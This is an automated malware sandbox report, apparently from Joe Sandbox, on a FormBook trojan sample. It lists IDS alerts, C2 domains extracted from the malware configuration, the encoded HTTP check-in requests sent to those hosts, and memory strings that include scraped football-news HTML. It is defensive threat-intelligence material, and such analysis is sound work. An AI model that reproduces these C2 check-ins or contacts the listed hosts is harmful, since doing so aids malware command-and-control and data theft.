Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.hnchotels.com/mb7q/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.belatopapparel.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1Host: www.pradnyanamaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.hepimizdostuz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1Host: www.hnchotels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.bookitstaugustine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1Host: www.beyju.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1Host: www.accessibleageing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.theskineditco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.thelandcle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1Host: www.tuyensinhhaiphong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.merkuryindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1Host: www.belatopapparel.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.helpmewithmyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1Host: www.softballlyfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.150.212 172.67.150.212
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: PEGTECHINCUS PEGTECHINCUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1Host: www.pradnyanamaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.hepimizdostuz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1Host: www.hnchotels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.bookitstaugustine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1Host: www.beyju.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.szmsbk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1Host: www.accessibleageing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.theskineditco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.thelandcle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1Host: www.tuyensinhhaiphong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.merkuryindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1Host: www.belatopapparel.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1Host: www.helpmewithmyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1Host: www.softballlyfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknown DNS traffic detected: queries for: myliverpoolnews.cf
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:31:12 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/BreadcrumbList
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/ListItem
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/NewsArticle
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
